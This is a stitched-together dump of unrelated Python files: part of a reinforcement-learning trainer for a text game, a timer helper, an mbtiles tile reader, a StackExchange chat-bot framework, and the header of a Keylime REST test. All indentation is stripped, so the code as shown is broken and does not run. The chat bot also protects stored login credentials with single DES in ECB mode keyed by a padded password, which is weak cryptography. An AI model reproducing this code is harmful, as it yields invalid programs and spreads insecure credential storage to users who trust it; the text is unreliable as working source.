#x4b = x4b.view((1,-1))
x4c = torch.cat((x4, x4b), 1)
x5 = F.relu(self.linear(x4c))
return self.objects(x5)
def train(net, rank):
torch.set_num_threads(1) #also do: export MKL_NUM_THREADS=1
net.reset()
env = Game(True, 4000 + rank + 1, max_steps=250)
target_net = Net(1254, 6, 36)
target_net.load_state_dict(net.state_dict())
target_net.reset()
epsilon = epsilon1
optimizer = optim.RMSprop(net.parameters(), lr=learning_rate)
last_save = time.time()
last_notify = time.time()
last_sync = time.time()
episode_number = 0
terminal = True
prev_value = None
available_objects = None
num_objects = len(env.objects)
recent_rewards_of_episodes = []
recent_steps_of_episodes = []
quest1_reward_cnt = 0
quest2_reward_cnt = 0
quest3_reward_cnt = 0
quest4_reward_cnt = 0
quest1_rewards = np.zeros(100)
quest2_rewards = np.zeros(100)
quest3_rewards = np.zeros(100)
quest4_rewards = np.zeros(100)
if rank == 0:
stats = []
while True:
if terminal:
student_saw_obelisk = False
quest1_rewards[episode_number % len(quest1_rewards)] = 0
quest2_rewards[episode_number % len(quest2_rewards)] = 0
quest3_rewards[episode_number % len(quest3_rewards)] = 0
quest4_rewards[episode_number % len(quest4_rewards)] = 0
prev_value = None
num_steps = 0
net.reset()
target_net.reset()
state, reward, terminal, available_objects = env.reset()
sum_rewards = reward
state = torch.LongTensor(state)
objects_probs = net(Variable(state.unsqueeze(0)))
_objects_probs = objects_probs.data.numpy()
#Choose action
if random.random() < epsilon:
if available_objects is None:
objects = list(enumerate(env.objects))
else:
objects = [_ for _ in list(enumerate(env.objects)) if _[0] in available_objects]
_object = random.choice(objects)[0]
else:
if available_objects is not None:
mask = np.zeros(num_objects)
for e in available_objects:
mask[e] = 1
_objects_probs = objects_probs.data.numpy() * mask
_objects_probs = _objects_probs + (_objects_probs == 0) * -1e30
_object = int(np.argmax(_objects_probs))
prev_value = objects_probs[0, _object]
# step the environment and get new measurements
state, reward, terminal, available_objects = env.step(5, _object)
sum_rewards += reward
num_steps += 1
if reward > 10 - 0.0001:
quest4_reward_cnt = quest4_reward_cnt + 1
quest4_rewards[episode_number % len(quest4_rewards)] = 1
elif reward > 8 - 0.0001:
quest3_reward_cnt = quest3_reward_cnt + 1
quest3_rewards[episode_number % len(quest3_rewards)] = 1
if not disable_curriculum:
if not student_saw_obelisk:
reward = -8
terminal = True
elif reward > 7 - 0.0001:
student_saw_obelisk = True
quest2_reward_cnt = quest2_reward_cnt + 1
quest2_rewards[episode_number % len(quest2_rewards)] = 1
if not disable_curriculum:
if np.mean(quest2_rewards) < 0.75 and random.random() < 0.9:
terminal = True
elif reward > 5 - 0.0001:
quest1_reward_cnt = quest1_reward_cnt + 1
quest1_rewards[episode_number % len(quest1_rewards)] = 1
if not disable_curriculum:
if np.mean(quest1_rewards) < 0.9 and random.random() < 0.85:
terminal = True
if 2 * epsilon > (epsilon1 + epsilon2):
if np.mean(quest3_rewards) > .98:
if np.mean(quest2_rewards) > .98:
if np.mean(quest1_rewards) > .98:
epsilon = epsilon2
if rank == 0:
notify("Epsilon is now:" + str(epsilon))
if terminal:
next_value = 0
else:
if target_q_ts is None:
next_value = float(np.max(_objects_probs))
else:
state = torch.LongTensor(state)
objects_probs = target_net(Variable(state.unsqueeze(0)))
_objects_probs = objects_probs.data.numpy()
if available_objects is not None:
mask = np.zeros(num_objects)
for e in available_objects:
mask[e] = 1
_objects_probs = _objects_probs * mask
_objects_probs = _objects_probs + (_objects_probs == 0) * -1e30
next_value = float(np.max(_objects_probs))
loss = (reward + gamma * next_value - prev_value) ** 2
#Update for only a tenth of the non important steps
if abs(reward) > 4 or random.random() < 0.05:
optimizer.zero_grad()
loss.backward(retain_graph=True)
nn.utils.clip_grad_norm(net.parameters(), 1)
optimizer.step()
if terminal:
recent_rewards_of_episodes.append(sum_rewards)
recent_steps_of_episodes.append(num_steps)
if len(recent_rewards_of_episodes) > 100:
recent_rewards_of_episodes.pop(0)
if len(recent_steps_of_episodes) > 100:
recent_steps_of_episodes.pop(0)
episode_number += 1
if target_q_ts is not None and time.time() - last_sync > target_q_ts:
if rank == 0:
print("Update target")
target_net.load_state_dict(net.state_dict())
last_sync = time.time()
if rank == 0:
stats.append({})
stats[-1]["episode_number"] = episode_number
stats[-1]["sum_rewards"] = sum_rewards
stats[-1]["num_steps"] = num_steps
stats[-1]["mean_recent_rewards_of_episodes"] = np.mean(recent_rewards_of_episodes)
stats[-1]["mean_recent_steps_of_episodes"] = np.mean(recent_steps_of_episodes)
stats[-1]["quest1_reward_cnt"] = quest1_reward_cnt
stats[-1]["quest2_reward_cnt"] = quest2_reward_cnt
stats[-1]["quest3_reward_cnt"] = quest3_reward_cnt
stats[-1]["quest4_reward_cnt"] = quest4_reward_cnt
stats[-1]["mean_quest1_rewards"] = np.mean(quest1_rewards)
stats[-1]["mean_quest2_rewards"] = np.mean(quest2_rewards)
stats[-1]["mean_quest3_rewards"] = np.mean(quest3_rewards)
stats[-1]["mean_quest4_rewards"] = np.mean(quest4_rewards)
summary = "{} {:.4} {} {:.4} {:.4} Qc: {} {} {} {} Q: {} {} {} {}".format(episode_number, sum_rewards, num_steps, np.mean(recent_rewards_of_episodes), np.mean(recent_steps_of_episodes), quest1_reward_cnt, quest2_reward_cnt, quest3_reward_cnt, quest4_reward_cnt, np.mean(quest1_rewards), np.mean(quest2_rewards), np.mean(quest3_rewards), np.mean(quest4_rewards))
print(summary)
if save_every is not None:
if time.time() - last_save > save_every:
print("Saving..")
torch.save(net.state_dict(), name)
with open(name_stats, "wb") as _fh:
pickle.dump(stats, _fh)
last_save = time.time()
if notify_every is not None:
if time.time() - last_notify > notify_every:
print("Notify..")
notify(summary)
last_notify = time.time()
if max_episodes is not None and episode_number == max_episodes:
torch.save(net.state_dict(), name)
with open(name_stats, "wb") as _fh:
pickle.dump(stats, _fh)
notify(summary)
notify("Done.")
print("Done.")
sys.exit()
def test(net, env, is_tutorial_world):
num_objects = len(env.objects)
quest4_reward_cnt = 0
quest3_reward_cnt = 0
quest2_reward_cnt = 0
quest1_reward_cnt = 0
total_reward = 0
nrewards = 0
nepisodes = 0
episode_reward = 0
total_steps = 0
num_step = 0
terminal = True
available_objects = None
while True:
if terminal:
num_step = 0
if test_text:
print("Press enter to start new game:")
input()
net.reset()
state, reward, terminal, available_objects = env.reset()
if test_text:
print(env.state2text(state, reward))
state = torch.LongTensor(state)
objects_probs = net(Variable(state.unsqueeze(0)))
if test_text:
print("Actions:", list(enumerate(env.actions)))
if available_objects is None:
print("Objects:", list(enumerate(env.objects)))
else:
print("Objects:", [_ for _ in list(enumerate(env.objects)) if _[0] in available_objects])
#Choose action
if random.random() < test_epsilon:
actions = list(enumerate(env.actions))
if available_objects is None:
objects = list(enumerate(env.objects))
else:
objects = [_ for _ in list(enumerate(env.objects)) if _[0] in available_objects]
_action = 5
_object = random.choice(objects)[0]
if test_text:
print(">>> " + str(_action) + "." + env.actions[_action] + " " + str(_object) + "." + env.objects[_object] + " [random choice]")
else:
_action = 5
if available_objects is not None:
mask = np.zeros(num_objects)
for e in available_objects:
mask[e] = 1
mask = torch.Tensor(mask)
mask = mask.unsqueeze(0)
mask = Variable(mask)
objects_probs = objects_probs * mask
objects_probs = objects_probs + (objects_probs == 0).float() * -1e30
_object = int(np.argmax(objects_probs.data.numpy()))
if test_text:
print("["+str(num_step)+"]>>> " + str(_action) + "." + env.actions[_action] + " " + str(_object) + "." + env.objects[_object])
print()
state, reward, terminal, available_objects = env.step(_action, _object)
if test_text:
print(env.state2text(state, reward))
total_steps += 1
num_step += 1
if is_tutorial_world:
if reward > 10 - 0.0001:
quest4_reward_cnt = quest4_reward_cnt + 1
elif reward > 8 - 0.0001:
quest3_reward_cnt = quest3_reward_cnt + 1
elif reward > 7 - 0.0001:
quest2_reward_cnt = quest2_reward_cnt + 1
elif reward > 5 - 0.0001:
quest1_reward_cnt = quest1_reward_cnt + 1
else:
if reward > 0.9:
quest1_reward_cnt = quest1_reward_cnt + 1
episode_reward = episode_reward + reward
if reward != 0:
nrewards = nrewards + 1
if terminal:
total_reward = total_reward + episode_reward
episode_reward = 0
nepisodes = nepisodes + 1
if is_tutorial_world:
print(nepisodes, "avg steps:", total_steps / nepisodes, "avg reward:", total_reward / nepisodes, "Q1:", quest1_reward_cnt / nepisodes, "Q2:", quest2_reward_cnt / nepisodes, "Q3:", quest3_reward_cnt / nepisodes, "Q4:", quest4_reward_cnt / nepisodes)
else:
print(nepisodes, "avg steps:", total_steps / nepisodes, "avg reward:", total_reward / nepisodes, "Q1:", quest1_reward_cnt / nepisodes)
if nepisodes == max_episodes:
sys.exit()
def main():
global Net
#global epsilon
global n_cpu
global test_text
port = 4001
test_mode = False
Net = Net_dnc
if len(sys.argv) > 1:
cmd = sys.argv[1]
for c in list(cmd):
if c == 't':
test_mode = True
elif c == 'T':
test_mode = True
test_text = True
elif c == 'p':
port = int(sys.argv[2])
print("port:", port)
#elif c == 'e':
# epsilon = float(sys.argv[2])
# print("epsilon:", epsilon)
elif c == 'd':
Net = Net_dnc
elif c == 'l':
Net = Net_lstm
elif c == 'a':
Net = Net_avg
elif c == 'n':
Net = Net_none
elif c == '1':
n_cpu = 1
print("Using:", Net)
#net = Net(len(env.symbols), len(env.actions), len(env.objects))
net = Net(1254, 6, 36)
#Try to load from file
if os.path.isfile(name):
print("Loading from file..")
net.load_state_dict(torch.load(name))
if not test_mode:
net.share_memory()
processes = []
for rank in range(n_cpu):
p = mp.Process(target=train, args=(net, rank))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
env = Game(True, port, max_steps=250)
test(net, env, True)
if __name__ == "__main__":
main()
|
Set.py | import logging
import threading
import time
log = logging.getLogger(__name__)
class Interval:
"""A class that loops every interval."""
def __init__(self, interval, action, id=None) -> None:
"""Initialize the interval loop.
Args:
interval (float): The interval in seconds.
action (function): The action to do.
"""
self.interval = interval
self.action = action
self.id = id
self.stop = threading.Event()
thread = threading.Thread(target=self._setInterval)
thread.start()
def _setInterval(self) -> None:
"""Does things."""
next = time.time() + self.interval
while not self.stop.wait(next - time.time()):
next += self.interval
try:
self.action(self.id)
except OSError as e:
log.exception(e)
pass
def cancel(self) -> None:
"""Cancels the interval."""
self.stop.set()
|
mbtiles_reader.py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2020 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
###############################################################################
# read mbtiles files and provide them for access via http
import os
import sqlite3
import sys
import threading
import create_overview
from avnav_util import AVNLog, AVNUtil, ChartFile
#mbtiles:
#zoom_level => z
#tile_column => x
#tile_row => 2^^z-1-y
class QueueEntry(object):
def __init__(self,tile):
self.cond=threading.Condition()
self.tile=tile
self.data=None
self.dataAvailable=False
def waitAndGet(self):
while True:
self.cond.acquire()
if self.dataAvailable:
self.cond.release()
return self.data
self.cond.wait(5)
self.cond.release()
def wakeUp(self):
self.cond.acquire()
try:
self.cond.notifyAll()
finally:
self.cond.release()
def setData(self,data):
self.cond.acquire()
self.data=data
self.dataAvailable=True
self.cond.notify_all()
self.cond.release()
class MBTilesFile(ChartFile):
def __init__(self,filename,timeout=300):
self.filename=filename
self.isOpen=False
self.cond=threading.Condition()
self.connection=None
self.zoomlevels=[]
self.zoomLevelBoundings={}
self.schemeTMS=True
self.originalScheme=None
self.schemeInconsistent=False #if there is a scheme entry in the DB but no avnav_schema
self.requestQueue=[]
self.timeout=timeout
self.stop=False
self.handler=threading.Thread(target=self.handleRequests)
self.handler.setDaemon(True)
self.handler.start()
self.changeCount=AVNUtil.utcnow()
def getOriginalScheme(self):
if not self.schemeInconsistent:
return None
return self.originalScheme
def wakeUp(self):
self.cond.acquire()
try:
self.cond.notify_all()
finally:
self.cond.release()
def handleRequests(self):
connection=sqlite3.connect(self.filename)
while not self.stop:
self.cond.acquire()
request=None
if len(self.requestQueue) > 0:
request=self.requestQueue.pop(0)
else:
self.cond.wait(5)
self.cond.release()
if request is not None:
data=self.getTileDataInternal(request.tile,connection)
request.setData(data)
connection.close()
#tile is (z,x,y)
def zxyToZoomColRow(self,tile):
if self.schemeTMS:
return [tile[0],tile[1],pow(2,tile[0])-1-tile[2]]
else:
return [tile[0],tile[1],tile[2]]
def rowToY(self, z, row):
if self.schemeTMS:
return pow(2,z)-1-row
else:
return row
def colToX(self, z, col):
return col
#open the file and prepare the overview
def open(self):
if self.isOpen:
raise Exception("mbtiles file %s already open" % (self.filename))
if not os.path.isfile(self.filename):
raise Exception("mbtiles file %s not found" %(self.filename))
self.createOverview()
self.isOpen=True
#tile is (z,x,y)
def getTileData(self,tile,source):
if not self.isOpen:
raise Exception("not open")
request=QueueEntry(tile)
self.cond.acquire()
try:
self.requestQueue.append(request)
self.cond.notify_all()
except:
pass
self.cond.release()
AVNLog.debug("waiting for tile")
data=request.waitAndGet()
AVNLog.debug("tile received")
return data
def getTileDataInternal(self,tile,connection):
cu=None
try:
cu=connection.execute("select tile_data from tiles where zoom_level=? and tile_column=? and tile_row=?",self.zxyToZoomColRow(tile))
t=cu.fetchone()
cu.close()
return t[0]
except Exception as e:
if cu is not None:
try:
cu.close()
except:
pass
return None
def getAvnavXml(self,upzoom=2):
if not self.isOpen:
return None
ranges=[]
for zl in self.zoomlevels:
de=self.zoomLevelBoundings[zl].copy()
de['zoom']=zl
ranges.append(de)
#create a single source with one range for each zoomlevel
data=[{"name":"mbtiles","ranges":ranges}]
return create_overview.getGemfInfo(data,{})
def createOverview(self):
zoomlevels=[]
zoomLevelBoundings={}
connection = sqlite3.connect(self.filename)
if connection is None:
raise Exception("unable to open mbtiles file %s" % (self.filename))
AVNLog.info("opening mbtiles file %s", self.filename)
cu = None
hasAvnavScheme=False
try:
cu = connection.cursor()
for sr in cu.execute("select value from metadata where name=?",["avnav_scheme"]):
v=sr[0]
if v is not None:
v=v.lower()
if v in ['tms','xyz']:
AVNLog.info("setting scheme for %s to %s",self.filename,v)
self.schemeTMS=False if v == "xyz" else True
self.schemeInconsistent=False
hasAvnavScheme=True
#check if there is a schema entry
for sr in cu.execute("select value from metadata where name=?",["scheme"]):
v=sr[0]
if v is not None:
v=v.lower()
self.originalScheme=v
if not hasAvnavScheme:
self.schemeInconsistent=True
for zl in cu.execute("select distinct zoom_level from tiles;"):
zoomlevels.append(zl[0])
for zl in zoomlevels:
el = {}
for rowmima in cu.execute("select min(tile_row),max(tile_row) from tiles where zoom_level=?", [zl]):
# names must match getGemfInfo in create_overview
if self.schemeTMS:
el['ymin'] = self.rowToY(zl, rowmima[1])
el['ymax'] = self.rowToY(zl, rowmima[0])
else:
el['ymin'] = self.rowToY(zl, rowmima[0])
el['ymax'] = self.rowToY(zl, rowmima[1])
for colmima in cu.execute("select min(tile_column),max(tile_column) from tiles where zoom_level=?", [zl]):
el['xmin'] = self.colToX(zl, colmima[0])
el['xmax'] = self.colToX(zl, colmima[1])
zoomLevelBoundings[zl] = el
except Exception as e:
AVNLog.error("error reading base info from %s:%s", self.filename, str(e))
self.zoomlevels=zoomlevels
self.zoomLevelBoundings=zoomLevelBoundings
if cu is not None:
cu.close()
connection.close()
self.changeCount=AVNUtil.utcnow()
def changeScheme(self,schema,createOverview=True):
if schema not in ['xyz','tms']:
raise Exception("unknown schema %s"%schema)
if schema == "xyz":
if not self.schemeTMS and not self.schemeInconsistent:
return False
self.schemeTMS=False
if schema == "tms":
if self.schemeTMS and not self.schemeInconsistent:
return False
self.schemeTMS=True
con=sqlite3.connect(self.filename)
cu = con.cursor()
try:
rs=cu.execute("select value from metadata where name=?", ["avnav_scheme"])
row=rs.fetchone()
if row is not None:
cu.execute("update metadata set value=? where name='avnav_scheme'",[schema])
con.commit()
else:
cu.execute("insert into metadata (name,value) values ('avnav_scheme',?)",[schema])
con.commit()
except Exception as e:
cu.close()
con.close()
raise
cu.close()
con.close()
if (createOverview):
self.createOverview()
return True
def getScheme(self):
return "tms" if self.schemeTMS else "xyz"
def close(self):
if not self.isOpen:
return
self.stop=True
#cancel all requests by returning None
self.cond.acquire()
requests=self.requestQueue
self.requestQueue=[]
self.cond.notify_all()
self.cond.release()
for rq in requests:
try:
rq.setData(None)
except:
pass
def deleteFiles(self):
self.close()
if os.path.isfile(self.filename):
os.unlink(self.filename)
def getChangeCount(self):
return self.changeCount
def getDownloadFile(self):
return self.filename
def __str__(self):
rt="mbtiles %s " %(self.filename)
return rt
if __name__ == "__main__":
f=MBTilesFile(sys.argv[1])
f.open()
print("read file %s" %(f,))
print(f.getAvnavXml())
|
chatbot.py | # -*- coding: utf-8 -*-
## V 3.0
"""
ChangeLog
- V3.0 -
Rewrote chatbot.py using classes
Cleaned the code
Using pycryptodome instead of simplecrypt
Using websockets to listen top new events
"""
## Description
"""
A framework to set up a chat bot on StackExchange's chat rooms
"""
# Imports and initialization
import requests # making POST/GET requests
import json # fast JSON library
import time # timestamping events + measuring intervals between events / pausing the program / getting time since epoch for starting timestamps
import os # get local path, create folders
import Cryptodome.Cipher.DES # encrypt and decrypt credidentials
import getpass # input password without outputing characters on CLI
import sys # exit program
import websocket # listen to and send websockets from/to the chat
import threading # multiprocessing - to make the rooms run in parallel
import datetime
EVENTS = {
1: "EventMessagePosted",
2: "EventMessageEdited",
3: "EventUserJoined",
4: "EventUserLeft",
5: "EventRoomNameChanged",
6: "EventMessageStarred",
7: "EventDebugMessage",
8: "EventUserMentioned",
9: "EventMessageFlagged",
10: "EventMessageDeleted",
11: "EventFileAdded",
12: "EventModeratorFlag",
13: "EventUserSettingsChanged",
14: "EventGlobalNotification",
15: "EventAccessLevelChanged",
16: "EventUserNotification",
17: "EventInvitation",
18: "EventMessageReply",
19: "EventMessageMovedOut",
20: "EventMessageMovedIn",
21: "EventTimeBreak",
22: "EventFeedTicker",
29: "EventUserSuspended",
30: "EventUserMerged",
34: "EventUserNameOrAvatarChanged",
}
# useful functions
def log(msg, name="../logs/log.txt",verbose=True): # Logging messages and errors | Appends <msg> to the log <name>, prints if verbose
msg=str(msg)
with open(name, "ab") as f:
timeStr = str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
f.write('{} {}\n'.format(timeStr,msg).encode('utf-8'))
if verbose: print('<Log> {}'.format(msg.encode('utf-8')))
def logFile(r,name="../logs/logFile.html"): # logs the string in the file <name>. Will overwrite previous data.
with open(name, "wb") as f:
f.write(r.encode('utf-8'))
def get_credidentials(decrypt_key = None): # gets credidentials from encrypted file / asks for them and encrypts them
## WARNING: ENCRYPTION DOES NOT SUPPORT PASSWORDS WITH " " (blank spaces) !!
def pad(text): # makes length a multiple of 8 and transforms to bytes
if len(text)%8==0: return text.encode('utf-8')
return (text+' '*(8-len(text)%8) ).encode('utf-8')
verif_text="verif||" # text used to check if the decrypted strings are the good ones, i.e. if the provided key is valid
if os.path.isfile("Credidentials"): # Credidentials file exists, decrypt them
goodPassword=False
while not goodPassword:
if decrypt_key is None:
hash_password = pad(getpass.getpass("Password for the encrypted credidentials ? "))
else:
hash_password = pad(decrypt_key)
with open("Credidentials","rb") as f:
encrypted_string=f.read()
encrypted_verif=encrypted_string[:encrypted_string.find(b'/../')]
encrypted_email=encrypted_string[encrypted_string.find(b'/../')+len(b'/../'):encrypted_string.find(b'|..|')]
encrypted_password = encrypted_string[encrypted_string.find(b'|..|')+len(b'|..|'):]
key=Cryptodome.Cipher.DES.new(hash_password, Cryptodome.Cipher.DES.MODE_ECB)
try:
verif=key.decrypt(encrypted_verif)
email=(key.decrypt(encrypted_email)).replace(b' ',b'')
password=(key.decrypt(encrypted_password)).replace(b' ',b'')
goodPassword= verif==pad(verif_text)
if goodPassword:
log('Credidentials retrieved successfully')
except Exception as e:
log('Error while decrypting credidentials: {}'.format(e))
goodPassword=False
if not goodPassword:
log('Bad password / corrupted file, try again.')
else: # No credidentials are stored, ask for new ones
with open("../configurations/vyxal-bot.json", "r") as f:
data = json.load(f)
email = data["email"]
password = data["password"]
return email, password
def abort(): sys.exit()
# handle rooms interactions
class Room():
def __init__(self, room_id, chatbot, onActivity):
# propagate vars
self.id=room_id # room identifier
self.chatbot=chatbot # parent chatbot
self.onActivity=onActivity # callback for events
#initialize vars
self.thread=None # own thread
self.running=False # currently running ?
self.ws=None # WebSocket
self.temp_path="{}/temp".format(self.id)
# initialize
self.connect_ws() # attempt to connect via WebSockets
if not os.path.exists("{}".format(self.id)):
os.makedirs("{}".format(self.id))
if not os.path.exists("{}/temp".format(self.id)):
os.makedirs("{}/temp".format(self.id))
def __repr__(self):
return 'Room(id = {})'.format(self.id)
def connect_ws(self):
payload={"fkey": self.chatbot.fkey,'roomid': self.id}
try:
print(self.chatbot.sendRequest("https://chat.stackexchange.com/ws-auth","post",payload).text)
r=json.loads(self.chatbot.sendRequest("https://chat.stackexchange.com/ws-auth","post",payload).text)
except Exception as e:
log("Connection to room {} failed : {}".format(self.id,e))
wsurl=r['url']+'?l={}'.format(int(time.time()))
self.ws = websocket.create_connection(wsurl, origin="http://chat.stackexchange.com")
self.thread = threading.Thread(target=self.run)
#self.thread.setDaemon(True)
self.thread.start()
def run(self):
self.running=True
while self.running:
try:
a = self.ws.recv()
except:
log('Unexpected error for room {}; rebooting'.format(self.id))
requests.get("http://localhost:5888/kill")
self.running=False
if a is not None and a != "":# not an empty messages
a=json.loads(a)
if "r{}".format(self.id) in a:
a=a["r{}".format(self.id)]
if a!={}:
try:
self.handleActivity(a)
except:
pass
def leave(self):
log("Left room {}".format(self.id))
self.running=False
self.chatbot.rooms_joined.remove(self)
def handleActivity(self, activity):
log('Got activity {}'.format(activity), verbose=False)
self.onActivity(activity)
try: activity_timestamp=activity['t']
except: log('Put in timeout for {} more seconds'.format(activity['timeout']))
if "e" in activity: # if there are events recorded
for event in activity['e']:
if event['event_type'] > 2:
log('Event: ' + EVENTS[event['event_type']])
log('Event details: ' + str(event))
def sendMessage(self, msg, wait=False):
if not wait: log(msg)
payload = {"fkey": self.chatbot.fkey, "text": msg}
headers={'Referer': 'https://chat.stackexchange.com/rooms/{}'.format(self.id),'Origin': 'https://chat.stackexchange.com'}
r = self.chatbot.sendRequest("http://chat.stackexchange.com/chats/{}/messages/new".format(self.id), "post", payload, headers=headers)
if r.text.find("You can perform this action again") >= 0: # sending messages too fast
time.sleep(3)
return self.sendMessage(msg, True)
if r.text.find("The message is too long") >= 0:
log("Message too long : {}".format(msg))
return False
r = r.json()
# log(r)
return r["id"]
def editMessage(self, msg, msg_id): # edit message with id <msg_id> to have the new content <msg>
payload = {"fkey": self.chatbot.fkey, "text": msg}
headers = {'Referer': "http://chat.stackexchange.com/rooms/{}".format(self.id)}
r = self.chatbot.sendRequest("http://chat.stackexchange.com/messages/{}".format(msg_id), "post", payload, headers).text
if r.find("You can perform this action again") >= 0:
time.sleep(3)
self.editMessage(msg, msg_id)
def deleteMessage(self, msg_id): # delete message with id <msg_id>
payload = {"fkey": self.chatbot.fkey}
headers = {'Referer': "http://chat.stackexchange.com/rooms/{}".format(self.id)}
r = self.chatbot.sendRequest("http://chat.stackexchange.com/messages/{}/delete".format(msg_id), "post", payload, headers).text
if r.find("You can perform this action again") >= 0:
time.sleep(3)
self.deleteMessage(msg_id)
# main class
class Chatbot():
def __init__(self, decrypt = None, verbose=True):
# init vars
self.session = requests.Session() # Session for POST/GET requests
self.fkey=None # key used by SE to authentify users, needed to talk in the chat
self.bot_chat_id=None
self.rooms_joined=[]
self.host=None
self.decrypt_key = decrypt
# propagate vars
self.verbose=verbose
def sendRequest(self, url, typeR="get", payload={}, headers={},verify=True): # sends a POST/GET request to <url> with arguments <payload>, headers <headers>. Will check SSL if <verify>.
r = ""
successful, tries = False, 0
while not successful:
try:
if typeR == "get":
r = self.session.get(url, data=payload, headers=headers, verify=verify)
elif typeR == "post":
r = self.session.post(url, data=payload, headers=headers, verify=verify, cookies=requests.utils.dict_from_cookiejar(self.session.cookies)) # ugly patch
else:
log("Error while sending requets - Invalid request type :{}".format(typeR))
successful = True
except Exception as e:
time.sleep(1)
if tries >= 4:
if type(r) != type(""): # string or request object ?
r = r.text
log("Error while sending request - The request failed : {}".format(e))
return False
tries += 1
return r
def log(self, msg, name="../logs/log.txt"): # Logging messages and errors | Appends <msg> to the log <name>, prints if self.verbose
log(msg,name,verbose=self.verbose)
def login(self, host="codegolf.stackexchange.com"): # Login to SE
def getField(field, url="", r=""):
"""gets the hidden field <field> from string <r> ELSE url <url>"""
if r == "":
r = self.sendRequest(url, 'get').text
r.encode('utf-8')
p = r.find('name="' + field)
if p <= 0:
error("No field <" + field + "> found", r)
p = r.find('value="', p) + len('value="')
key = r[p:r.find('"', p + 1)]
return key
self.log("--- NEW LOGIN ---")
email, password = get_credidentials(self.decrypt_key)
# Login to OpenId / CSE
fkey=getField("fkey", "https://openid.stackexchange.com/account/login")
payload = {"email": email, "password": password, "isSignup":"false", "isLogin":"true","isPassword":"false","isAddLogin":"false","hasCaptcha":"false","ssrc":"head","submitButton":"Log in",
"fkey": fkey}
r = self.sendRequest("https://{}/users/login-or-signup/validation/track".format(host),"post",payload).text
if r.find("Login-OK")<0:
log("Logging to SE - FAILURE - aborting")
abort()
log("Logging to SE - OK")
payload = {"email": email, "password": password, "ssrc":"head", "fkey": fkey}
r = self.sendRequest("https://{}/users/login?ssrc=head&returnurl=https%3a%2f%2f{}%2f".format(host, host),"post",payload).text
if r.find('<a href="https://{}/users/logout"'.format(host))<0:
if 'Human verification' in r:
log('Caught by CAPTCHA')
log("Loading SE profile - FAILURE - aborting")
abort()
log("Loading SE profile - OK")
# Logs in to all other SE sites
self.sendRequest("https://{}/users/login/universal/request".format(host),"post")
# get chat key
r = self.sendRequest("https://chat.stackexchange.com/chats/join/favorite", "get").text
p=r.find('<a href="/users/')+len('<a href="/users/')
self.bot_chat_id=int(r[p:r.find('/',p)])
fkey=getField("fkey", r=r) # /!\ changes from previous one
self.fkey=fkey
log("Got chat fkey : {}".format(fkey))
log("Login to the SE chat successful")
def joinRoom(self,room_id,onActivity): # Join a chatroom
r=Room(room_id, self, onActivity)
self.rooms_joined.append(r)
return r
def leaveAllRooms(self):
for room in self.rooms_joined:
room.leave()
def logout(self):
self.sendRequest('https://openid.stackexchange.com/account/logout', 'post')
|
test_restful.py | #!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
NOTE:
This unittest is being used as a procedural test.
The tests must be run in-order and CANNOT be parallelized!
Tests all but two RESTful interfaces:
* agent's POST /v2/keys/vkey
- Done by CV after the CV's POST /v2/agents/{UUID} command is performed
* CV's PUT /v2/agents/{UUID}
- POST already bootstraps agent, so PUT is redundant in this test
The registrar's PUT vactivate interface is only tested if a vTPM is present!
USAGE:
Should be run in test directory under root privileges with either command:
* python -m unittest -v test_restful
* green -vv
(with `pip install green`)
To run without root privileges, be sure to export KEYLIME_TEST=True
For Python Coverage support (pip install coverage), set env COVERAGE_FILE and:
* coverage run --parallel-mode test_restful.py
'''
import sys
import signal
import unittest
import subprocess
import time
import os
import base64
import threading
import shutil
import errno
from pathlib import Path
import dbus
import simplejson as json
from keylime import config
from keylime import tornado_requests
from keylime.requests_client import RequestsClient
from keylime import tenant
from keylime import crypto
from keylime.cmd import user_data_encrypt
from keylime import secure_mount
from keylime.tpm import tpm_main
from keylime.tpm import tpm_abstract
# Coverage support
if "COVERAGE_FILE" in os.environ:
FORK_ARGS = ["coverage", "run", "--parallel-mode"]
if "COVERAGE_DIR" in os.environ:
FORK_ARGS += ["--rcfile=" + os.environ["COVERAGE_DIR"] + "/.coveragerc"]
else:
FORK_ARGS = ["python3"]
# Custom imports
PACKAGE_ROOT = Path(__file__).parents[1]
KEYLIME_DIR = (f"{PACKAGE_ROOT}/keylime")
sys.path.append(KEYLIME_DIR)
# Custom imports
# PACKAGE_ROOT = Path(__file__).parents[1]
# CODE_ROOT = (f"{PACKAGE_ROOT}/keylime/")
# sys.path.insert(0, CODE_ROOT)
# Will be used to communicate with the TPM
tpm_instance = None
# cmp depreciated in Python 3, so lets recreate it.
def cmp(a, b):
return (a > b) - (a < b)
# Ensure this is run as root
if os.geteuid() != 0 and config.REQUIRE_ROOT:
sys.exit("Tests need to be run with root privileges, or set env KEYLIME_TEST=True!")
# Force sorting tests alphabetically
unittest.TestLoader.sortTestMethodsUsing = lambda _, x, y: cmp(x, y)
# Environment to pass to services
script_env = os.environ.copy()
# Globals to keep track of Keylime components
cv_process = None
reg_process = None
agent_process = None
tenant_templ = None
# Class-level components that are not static (so can't be added to test class)
public_key = None
keyblob = None
ek_tpm = None
aik_tpm = None
vtpm = False
# Set up mTLS
my_cert = config.get('tenant', 'my_cert')
my_priv_key = config.get('tenant', 'private_key')
cert = (my_cert, my_priv_key)
tls_enabled = True
# Like os.remove, but ignore file DNE exceptions
